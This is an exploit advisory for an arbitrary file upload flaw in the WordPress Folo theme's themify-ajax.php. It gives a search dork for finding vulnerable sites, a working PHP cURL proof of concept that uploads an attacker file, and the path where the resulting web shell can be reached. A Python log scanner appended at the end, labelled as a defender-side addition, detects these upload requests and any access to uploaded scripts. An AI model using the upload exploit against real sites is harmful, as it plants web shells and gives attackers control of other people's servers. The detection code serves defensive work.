Wordpress Themes Folo Arbitrary File Upload Vulnerability


#Exploit Title : Wordpress Themes Folo Arbitrary File Upload Vulnerability
#Author : ReC0ded
#Vendor : http://themify.me/
#Download : http://themify.me/themes/folo
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload
#Tested On : Windows 7 32-bit | Google Chrome

#Dork : inurl:/wp-content/themes/folo/ | USE YOUR BRAIN =))

#Exploit : http://victim/[PATH]/wp-content/themes/folo/themify/themify-ajax.php

#POC : 

<?php
$uploadfile="ReC0ded.php";
$ch = curl_init("http://victim/[PATH]/wp-content/themes/folo/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

#Results See Your Shell On : http://victim/[PATH]/wp-content/themes/folo/uploads/{YOUR_FILE}.php
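
Defender-side check, added here as an example and not part of the original advisory: it scans web server access logs for the two request patterns the advisory describes, a POST to themify-ajax.php carrying the upload parameter and any later request for a script-typed file under the theme's uploads directory. The common/combined log format, the sample lines and the names scan and SAMPLE_LOG are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Paths come from the advisory; an install prefix ([PATH]) may precede them.
AJAX_RE = re.compile(r"/wp-content/themes/folo/themify/themify-ajax\.php$", re.I)
# Script-like types named in the advisory's #Type line (php, html, htm, asp).
UPLOADS_RE = re.compile(
    r"/wp-content/themes/folo/uploads/[^/]+\.(php|html?|asp)$", re.I)
# Assumed log format: Apache/nginx common or combined.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [22/Nov/2013:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Nov/2013:10:01:02 +0000] "POST /blog/wp-content/themes/folo/themify/themify-ajax.php?upload=1 HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [22/Nov/2013:10:01:09 +0000] "GET /blog/wp-content/themes/folo/uploads/sample.php HTTP/1.1" 200 12 "-" "-"',
    '198.51.100.4 - - [22/Nov/2013:10:02:00 +0000] "GET /blog/wp-content/themes/folo/uploads/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

def scan(lines):
    """Return findings as (kind, ip, time, target, status) tuples."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # line is not in the assumed format
        ip, when, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)  # catch percent-encoded path variants
        query = parse_qs(url.query, keep_blank_values=True)
        if method == "POST" and AJAX_RE.search(path) and "upload" in query:
            findings.append(("upload_attempt", ip, when, target, int(status)))
        elif UPLOADS_RE.search(path):
            findings.append(("uploaded_script_access", ip, when, target, int(status)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

An uploaded_script_access finding with a 200 status means a script-typed file is being served from the theme's uploads directory, so that directory should be inspected on disk.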
